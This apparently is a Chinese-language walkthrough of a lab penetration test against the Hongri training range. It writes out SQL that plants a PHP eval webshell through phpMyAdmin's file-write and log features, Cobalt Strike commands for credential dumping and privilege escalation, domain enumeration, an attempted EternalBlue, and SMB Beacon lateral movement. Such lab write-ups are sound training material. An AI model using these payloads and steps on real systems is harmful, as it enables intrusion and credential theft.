记录一下内网渗透的整个过程
记录一下内网渗透的整个过程,技术太菜,有错误的话还请大佬们指点一下 。(只要我运气够好,渗透就能一帆风顺——馒头)
记录一下红日靶场内网渗透的过程
下载红日安全团队的靶场-->下载链接
第一步:下载并解压到一个文件夹内
第二步、使用VM虚拟机分别添加三个虚拟机,并调整一下网络适配器,使得Win7和其他两个同属于一个局域网,而且Win7可以访问外网。
| Win7 |  |
| Win2003和Win2008 |  |
第三步、启动三个虚拟机,密码都是hongrisec@2019,登录必须修改密码可以改为Qq123456,启动Win7的PHPstudy
查看三个虚拟机的ip地址
Win7:外网192.168.193.131 内网:192.168.52.143(可以ping通其他两个)
Win2008:192.168.52.138
Win2004:192.168.52.141
第四步、外网渗透
1、信息收集,目录扫描
找到备份文件和phpmyadmin登录界面,到这里可以选择备份的代码审计或者phpmyadmin的nday利用和密码爆破
我是利用弱口令,账号密码都是root,进入后台进行mysql的getshell
1、查询是否有写入条件:
show VARIABLES like '%secure_file_priv%' == null 则没有条件,换成日志写入 (secure_file_priv值可在mysql中的my.ini中修改)
show global variables like "secure%" 也可以查询
2、 select @@basedir; 查看物理路径
3、当具备条件时,写入一句话文件:
select '<?php eval($_POST["pwd"]); ?>' into outfile 'C:/phpStudy/WWW/shell.php';
4、查看日志开启状态
show variables like '%general%'; 查看日志状态
SET GLOBAL general_log='on' 开启日志
SET GLOBAL general_log_file='C:/phpStudy/www/shell.php' 指定日志文件
SELECT '<?php eval($_POST["cmd"]);?>' 木马写到日志里
|
进入后台 |
 |
|
查看写入权限 (NULL 无权限) |
 |
|
查看物理地址 (C:/phpStudy/MySQL) |
 |
查看日志状态 |
|
开启日志 |
 |
指定日志文件 |
 |
木马写到日志里 |
 |
查看日志 |
|
上菜刀
|
|
第五步、内网渗透
上线的话一般使用MSF或者Cobalts Strike,我比较喜欢用CS
CS常用命令
argue 匹配进程的欺骗参数 audit_uac 审查关于bypass uac 的方法 blockdlls 在子进程中阻止非Microsoft DLL browserpivot 设置浏览器透视会话 cancel 取消正在进行的下载 cd 更改目录 checkin 呼叫总部并发布数据 clear 清除信标队列 connect 通过TCP连接到信标对等方 covertvpn 部署隐蔽VPN客户端 cp 复制文件 dcsync 从DC中提取密码哈希 desktop 查看目标的桌面并与之交互 dllinject 将反射DLL注入进程 dllload 使用LoadLibrary()将DLL加载到进程中 download 下载文件 downloads 列出正在进行的文件下载 drives 列出目标上的驱动器 elevate 在提升的上下文中生成会话 execute 在目标上执行程序(无输出) execute-assembly 在目标上的内存中执行本地.NET程序 exit 终止信标会话 getprivs 在当前令牌上启用系统权限 getsystem 尝试获取系统 getuid 获取用户ID hashdump 转储密码哈希 help 帮助菜单 inject 在特定进程中生成会话 jobkill 杀死长时间运行的利用后任务 jobs 列出长期运行的利用后任务 jump 在远程主机上生成会话 kerberos_ccache_use 将kerberos票证从缓存应用到此会话 kerberos_ticket_purge 从此会话中清除kerberos票证 kerberos_ticket_use 将kerberos票证应用于此会话 keylogger 将击键记录器注入进程 kill 终止进程 link 通过命名管道连接到信标对等点 logonpasswords 使用mimikatz转储凭据和哈希 ls 列出文件 make_token 创建令牌以传递凭据 mimikatz 运行mimikatz命令 mkdir 制作目录 mode dns 使用DNS A作为数据通道(仅DNS信标) mode dns-txt 使用DNS TXT作为数据通道(仅DNS信标 mode dns6 使用DNS AAAA作为数据通道(仅DNS信标) mv 移动文件 net 网络和主机枚举工具 note 为该信标指定一个注释 portscan 扫描网络中的开放服务 powerpick 通过非托管PowerShell执行命令 powershell 通过powershell.exe执行命令 powershell-import 导入powershell脚本 ppid 为衍生的事后交货作业设置父PID ps 显示进程列表 psinject 在特定进程中执行PowerShell命令 pth 使用Mimikatz传递散列 pwd 打印当前目录 reg 查询注册表 remote-exec 在远程主机上运行命令 rev2self 还原为原始令牌 rm 删除文件或文件夹 rportfwd 设置反向端口前进 run 在目标上执行程序(返回输出) runas 以另一个用户的身份执行程序 runasadmin 在提升的上下文中执行程序 runu 在另一个PID下执行程序 screenshot 截图 setenv 设置环境变量 shell 通过cmd.exe执行命令 shinject 将外壳代码注入进程 shspawn 生成进程并将外壳代码注入其中 sleep 设置信标睡眠时间 socks 启动SOCKS4a服务器以中继流量 socks stop 停止SOCKS4a服务器 spawn 生成会话 spawnas 作为另一个用户生成会话 spawnto 将可执行文件设置为将进程生成到 spawnu 在另一进程下生成会话 ssh 使用SSH在主机上生成SSH会话 ssh-key 使用SSH在主机上生成SSH会话 steal_token 从进程中窃取访问令牌 timestomp 将时间戳从一个文件应用到另一个文件 unlink 断开与父信标的连接 upload 上传文件
CS提权:
uac-token-duplication 是一种绕过uac方式的攻击,吧地权限提高到高权限,利用一个UAC漏洞,允许非提升进程使用提升进程中窃取的令牌来启动,适用于win7 svc-exe 用于提升权限,用法类似getsystem命令 ms14-058|ms15-015|ms16-016|ms16-032|ms16-032|ms16-315 这几种方式都差不多,通过windows的本地提权漏洞来提权 juicypotato 在cobaltstrike中使用烂土豆来提权,相对可靠 compmgmt 了解不多,似乎是通过windows的compmgmt去提权 rottenpotato 从Windows服务帐户到系统的本地权限升级 uac-eventvwr 通过注册表,利用eventvwr.exe 会自动加载我们的exp,这时的eventvwr.exe为高权限,达到提权效果 uac-dll 利用UAC漏洞,把我们的exp生成的dll复制到特定位置来达到提权效果,可绕过UAC uac-wscript 这是一个empire中的绕过UAC模块,通过利用wscript.exe 去执行payload,以管理员权限去运行payload,只限于win7上使用
| 上线CS |  |
| CS生成木马 |  |
|
上线客户端 (没有免杀) |
|
|
成功上线 |
 |
|
截个屏看一下 |
 |
|
靶机信息收集 (shell ipconfig) |
|
| 抓取明文密码 |  |
|
提权 (svc-exe) |
 |
| 内网信息收集 |
net view # 查看局域网内其他主机名 |
|
查看是否存在域 存在域(god.org) |
shell net config Workstation |
|
查询当前域的个数 只有一个 |
shell net view /domain |
|
查看域控制器主机名 OWA |
shell net group "domain controllers" /domain
|
|
查看局域网内其他 主机信息 |
net view
|
|
确认一下该主机 是否也是存在域中 |
shell net group "domain computers" /domain
|
| 开启MSF监听端口 |
use exploit/multi/handler |
| CS开启监听 |  |
| 新建会话到MSF |  |
| MSF获得shell会话 |  |
| 现在两条路 |
第一:使用MSF的攻击模块来进行横向渗透 第二:使用CS来进行横向渗透,添加一些插件 我的CS还没有攻击的插件模块,所以使用MSF来攻击域控 |
| 查看域控的开放端口 |
|
|
445端口可能存在 ms17_010 永恒之蓝漏洞 |
 |
|
利用永恒之蓝 进行代码执行 失败! |
 |
|
还是用CS来吧 可视化切换到 目标列表 |
 |
|
先查一下账户密码 logonpasswords |
|
|
创建监视器 smb |
 |
|
横向移动 |
 |
|
横向主机上线 |
 |
|
同上,内网主机 已经全部上线 |
 |
|
找一下域控主机 放的flag |
 |
| 拓扑透视图 |  |
总结一下:
外网是一个Yxcms,这个cms存在弱口令文件上传等漏洞,通过弱口令进入PHPMyAdmin,因为没有路径写入权限,然后使用写入日志来写入一句话木马。菜刀连接日志解析的一句话木马,使用Cobalts Strike生成可执行文件上传到网站目录,菜刀进行执行命令语句,上线CS,之后开始内网渗透。
内网渗透首先信息收集,查到了只有一个内域OWA,内域中还有两个主机,其中一个是域控主机。先给当前的跳板提一下权,使用的是svc-exe提权方式。
接下来目的是横向渗透使用这个Win7作为跳板,拿下内网域内的域成员主机和域控主机,首先使用CS和MSF联动查到开放455端口,打了个永恒之蓝发现失败。拼一下运气,用CS的SMB Beacon横向渗透成功:
简介:SMB Beacon使用命名管道通过父Beacon进行通信。此对等通信与Beacons在同一主机上工作。它也适用于整个网络。Windows在SMB协议中封装命名管道通信,对内网中无法链接公网的机器,SMB Beacon可以通过已控制的边界服务器对其进行控制。
口头语言解释:外网中的A主机与B主机相通且已控制B,B主机可以与内网中的C主机(无法连接公网)相通,但是A主机与C主机不相通,此时就需要在B主机上利用SMB beacon使A和C相通,进而使A主机控制C主机。
使用前提:B能访问到C的SMB端口,拥有SMB的管理员账号密码(一般在B上抓密码去碰撞)
①具有SMB Beacon的主机必须接受端口445上的连接。
②只能链接由同一Cobalt Strike实例管理的Beacon。
具体步骤:
①获取C的管理员账号密码
②创建SMB Listener
③使用net use进行利用、验证及创建SMB Beacon
